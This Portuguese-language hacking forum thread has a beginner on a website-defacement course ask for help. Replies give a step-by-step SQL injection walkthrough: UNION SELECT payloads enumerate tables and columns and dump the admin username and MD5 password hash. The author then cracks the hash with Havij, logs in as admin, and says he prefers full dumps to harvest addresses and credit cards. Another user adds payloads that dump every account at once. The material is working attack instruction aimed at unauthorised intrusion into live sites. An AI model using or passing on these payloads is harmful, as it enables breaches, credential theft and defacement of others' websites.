Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

1 help

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    1 help

    Falae galera, beleza?
    Estou iniciando o curso básico de defacer aqui.
    Claro que como todos, no inicio temos problemas, porém to com um problema desde ontem tentando resolver e não consigo.
    Segue abaixo uma imagem do meu problema, sei que para muitos a solução é simples, mas peço que me deem alguma dica de como resolver esse problema, não quero que me entregue de mão beijada, mas só um help para que assim eu possa prosseguir com a obtenção de conhecimento.

    Obrigado!


    Porque estudar a criação se eu posso estudar a invasão?

  • Font Size
    #2
    strong3r, coloque todo o comando que você está usando no navegador...
    Coloque o site também (:
    Abraço




    "Antes de conseguir você tem que acreditar."

    Comment


    • Font Size
      #3
      strong3r, coloque todo o comando que você está usando no navegador...
      Coloque o site também (:
      Abraço




      "Antes de conseguir você tem que acreditar."

      Comment


      • Font Size
        #4
        Postado Originalmente por MailsonHeberth Ver Post
        strong3r, coloque todo o comando que você está usando no navegador...
        Coloque o site também (:
        Abraço
        Opa, tudo beleza?

        segue abaixo o link com os comandos.
        Abraço!

        Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.columns


        Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
        Porque estudar a criação se eu posso estudar a invasão?

        Comment


        • Font Size
          #5
          strong3r, brother, confesso que tentei nesse site, mas nao consegui também...
          Mas vou mostrar a você como se faz...


          Coloque uma simples aspas no final e ira retonar um erro de sql, ele pode vim tanto como uma mensagem avisando ou sumindo tudo que tem na página.
          Eu tomei como exemplo um site X (prefiro nao divulgar para nao ter ataques a ele)

          Passo 1:
          Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...'
          Retornou a pagina desse ficou em branco...
          Passo 2:
          Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... order by 6 (OK)
          Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... order by 7 (ERRO)
          Passo 3:
          Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union select 1,2,3,4,5,6--
          ou
          Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union select 1,2,3,4,5,6--
          Passo 4:
          Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union select 1,2,group_concat(table_name)9,4,5,6+from+informati on_schema.tables+where+table_schema=database()--
          Me retornou:
          ategorias,produtos,subcategorias,users

          Passo 5:
          Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union select 1,2,group_concat(column_name)9,4,5,6+from+informat ion_schema.columns+where+table_schema=database()--
          Me retornou
          catID,catNome,catDesc,catImg,catExibe,prodID,prodC atID,prodSubID,prodNome,prodDesc,prodImg,prodDest, prodExibe,subID,subCatID,subNome,subDesc,subImg,su bExibe,userID,userUser,userSenha,userTipo
          Temos a tabela e a coluna.
          Agora:
          Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union select 1,2,3,4,5,6--
          Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union select 1,2,3,4,5,6 from users--
          Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union select 1,2,userUser,4,5,6 from users--
          Me retornou:
          admin
          Agora:
          Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union select 1,2,userSenha,4,5,6 from users--
          Me retornou:
          e8d95a51f3af4a3b134bf6bb680a213a ( MD5 )
          E a senha dele é:
          e8d95a51f3af4a3b134bf6bb680a213a = senha
          Isso mesmo, essa é a senha dele.
          Achando área de login:
          Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
          Login: admin
          Senha: senha
          Obs: Usei o havij para descriptografar a senha em MD5 e usei o mesmo para achar a página de login do administrador.
          Na minha opinião essa é a única utilidade do havij


          Espero ter esclarecido suas dúvidas, abraço.

          Tutorial by MailsonHeberth




          "Antes de conseguir você tem que acreditar."

          Comment


          • Font Size
            #6
            Postado Originalmente por MailsonHeberth Ver Post
            strong3r, brother, confesso que tentei nesse site, mas nao consegui também...
            Mas vou mostrar a você como se faz...


            Coloque uma simples aspas no final e ira retonar um erro de sql, ele pode vim tanto como uma mensagem avisando ou sumindo tudo que tem na página.
            Eu tomei como exemplo um site X (prefiro nao divulgar para nao ter ataques a ele)

            Passo 1:

            Retornou a pagina desse ficou em branco...
            Passo 2:
            Passo 3:
            Passo 4:
            Me retornou:

            Passo 5:
            Me retornou
            Temos a tabela e a coluna.
            Agora:



            Me retornou:

            Agora:

            Me retornou:

            E a senha dele é:

            Isso mesmo, essa é a senha dele.
            Achando área de login:


            Obs: Usei o havij para descriptografar a senha em MD5 e usei o mesmo para achar a página de login do administrador.
            Na minha opinião essa é a única utilidade do havij


            Espero ter esclarecido suas dúvidas, abraço.[/center]

            Tutorial by MailsonHeberth
            Pow cara, fico muito agradecido, isso aí vai me fornecer uma grande ajuda para prosseguir com os estudos!!

            Valeu mesmo!!
            Porque estudar a criação se eu posso estudar a invasão?

            Comment


            • Font Size
              #7
              No caso ai vc usou um comando para exibir todas colunas do database, mostrando colunas de outras tabelas desnecessárias.

              Vc pode user o seguinte:
              Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union select 1,2,group_concat(column_name)9,4,5,6+from+informat ion_schema.columns+where+table_name=0x7573657273--
              Assim mostrará apenas colunas da tabela "users", repare que no final o nome da tabela está em hex.

              7573657273 = users

              Outra dica é, usar o seguinte:

              Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union select 1,2,group_concat(userUser,0x3a,userSenha),4,5,6 from users--
              Assim, me retornará todas as contas de usuários enfileiradas presente no db.

              Hex/Ascii
              Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
              Flw.



              areax@hotmail.com



              Comment


              • Font Size
                #8
                Postado Originalmente por areax Ver Post
                No caso ai vc usou um comando para exibir todas colunas do database, mostrando colunas de outras tabelas desnecessárias.

                Vc pode user o seguinte:

                Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union select 1,2,group_concat(column_name)9,4,5,6+from+informat ion_schema.columns+where+table_name=0x7573657273--
                Assim mostrará apenas colunas da tabela "users", repare que no final o nome da tabela está em hex.

                7573657273 = users

                Outra dica é, usar o seguinte:

                Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union select 1,2,group_concat(userUser,0x3a,userSenha),4,5,6 from users--
                Assim, me retornará todas as contas de usuários enfileiradas presente no db.

                Hex/Ascii

                Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
                Flw.
                Verdade, mas eu gosto de fazer ele detalhado pois pode ter algo que me interesse... Como endereços, cc, etc

                Abraço




                "Antes de conseguir você tem que acreditar."

                Comment


                • Font Size
                  #9
                  O comando SELECT está bloqueado para esse usuário.

                  Logo não dá pra explorar, só fazer union, pegar versão, data, etc.
                  sigpic

                  Comment


                  • Font Size
                    #10
                    Me serviu de estudo tambem, brigado a voces

                    sigpic

                    "Conhecimento não é crime, crime é o que você faz com ele."
                    "Nunca deixe te dizer que você não é capaz"
                    "Vocês podem me acorrentar, torturar e até destruir meu corpo, mas nunca aprisionaram minha mente"




                    Full Access Defacer


                    e-mail & msn: warlockowned@yahoo.com.br


                    Comment


                    • Font Size
                      #11
                      antes de puxar information_schema , verifique a versao do banco de dados com o version() :

                      "union select 1,3,4,5,version(),6,7 "

                      para ver a versao do banco de dados.

                      pois em 4, nao é possivel consultar o information, pois nesta versao nao temos ele, apenas nos ultimos e olhe la. ou seja ~> o 5 que traz o information_schema

                      nada de mais,apenas isto justifica o acsses denied ^^
                      n4sss@m4g1cl4b~#$I
                      just this.

                      Comment

                      X
                      Working...
                      X